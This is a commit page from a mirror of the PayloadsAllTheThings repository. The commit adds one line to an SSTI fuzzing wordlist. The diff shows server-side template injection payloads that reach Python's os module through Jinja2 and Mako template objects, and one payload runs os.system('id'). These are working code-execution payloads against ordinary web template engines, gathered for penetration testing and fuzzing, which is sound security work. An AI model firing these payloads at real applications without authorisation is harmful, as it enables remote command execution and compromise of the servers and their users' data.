1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-03-28 10:20:03 +01:00

Update ssti.fuzz

This commit is contained in:
p0dalirius 2021-10-04 09:21:10 +02:00
parent 36dc8742c1
commit 9ce58c14ef

View File

@ -105,3 +105,4 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
{{self._TemplateReference__context.namespace.__init__.__globals__.os}}
{{cycler.__init__.__globals__.os}}
{{joiner.__init__.__globals__.os}}
{{namespace.__init__.__globals__.os}}